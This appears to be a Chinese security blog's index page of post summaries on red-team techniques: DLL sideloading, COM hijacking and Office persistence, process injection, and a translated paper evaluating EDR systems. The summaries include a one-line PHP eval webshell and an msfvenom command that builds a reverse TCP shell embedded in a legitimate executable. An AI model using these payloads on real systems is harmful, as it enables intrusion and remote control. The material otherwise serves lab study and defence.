将者，智、信、仁、勇、严也。

摘要： 下载phpstudy，链接：https://public.xp.cn/upgrades/phpStudy_64.zip，如下图启动wnmp。 webshell内容： <?php echo "Your response is: ";?> <?php @eval($_GET['cmd']);?> 写入C 阅读全文

摘要： https://flangvik.com/privesc/windows/bypass/2019/06/25/Sideload-like-your-an-APT.html 我是按照这个链接进行复现的，文章里使用的是notepad++，但是最新的notepad++已经没有了libcurl，所以我自己找 阅读全文

摘要： https://www.mdpi.com/2624-800X/1/3/21/htm 软件翻译如下： 针对高级持续威胁攻击向量的端点检测和响应系统的实证评估 经过 乔治·卡兰查斯 1 和 康斯坦丁诺斯·帕萨基斯 1,2,* 1 比雷埃夫斯大学信息学系, 80 Karaoli & Dimitriou S 阅读全文

摘要： Sideloading DLL攻击 2021年9月4日06:38:12逆向工程评论111 views787字阅读2分37秒阅读模式 今天看到了国外的一个白皮书，地址如下： https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deplo 阅读全文

摘要： https://github.com/BlueTeamLabs/sentinel-attack/tree/master/detections ==》这个更全些 https://github.com/Azure/Azure-Sentinel/blob/83c6d8c7f65a5f209f39f3e06 阅读全文

摘要： from：https://pentestlab.blog/2020/05/20/persistence-com-hijacking/?msclkid=5fdfee8bc15811ec8aa81df895acc3e4 Microsoft introduced Component Object Mode 阅读全文

摘要： 生成payload：msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe靶机运行r2 阅读全文

摘要： 补充：kali里两个虚拟机之间互相访问设置，https://blog.csdn.net/elie_yang/article/details/88895660，就只需要设置下桥接网络就行！ kali里： sudo vi /etc/network/interfaces添加： auto eth0 ifac 阅读全文

摘要： 持久化：Office 应用程序启动 子技术 (6) 对手可能会利用基于 Microsoft Office 的应用程序在初创公司之间保持持久性。Microsoft Office 是企业网络中基于 Windows 的操作系统上相当常见的应用程序套件。启动基于 Office 的应用程序时，有多种机制可用于 阅读全文

摘要： 下载地址：https://www.tarasco.org/security/Process_Injector/processinjector.zip 进程注入（pinjector.exe）提权进程注入将pinjector注入到用户的进程里一起运行，进而同时拥有了对应的权限。是一种比较隐蔽的手段，不会 阅读全文